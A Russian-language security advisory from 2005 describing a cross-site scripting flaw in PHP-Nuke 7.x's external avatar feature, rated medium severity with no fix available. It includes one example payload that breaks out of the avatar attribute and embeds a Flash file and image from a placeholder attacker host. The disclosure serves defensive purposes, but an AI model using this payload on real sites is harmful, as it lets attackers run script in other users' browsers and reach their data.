Межсайтовый скриптинг в PHP-Nuke при подключении внешних аватаров

Дата публикации:29.06.2005
Дата изменения:17.10.2006
Всего просмотров:1787
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PHP-Nuke 7.x
Уязвимые версии: PHP-Nuke

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует из-за недостаточной обработки входных данных при создании ссылки на внешний аватар. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

" width=0 height=0><embed src=http://[attacker]/
redirect.swf width=0 height=0><img src=http://[attacker]/avatar.bmp

URL производителя: www.phpnuke.org

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PHP nuke XSS vulnerability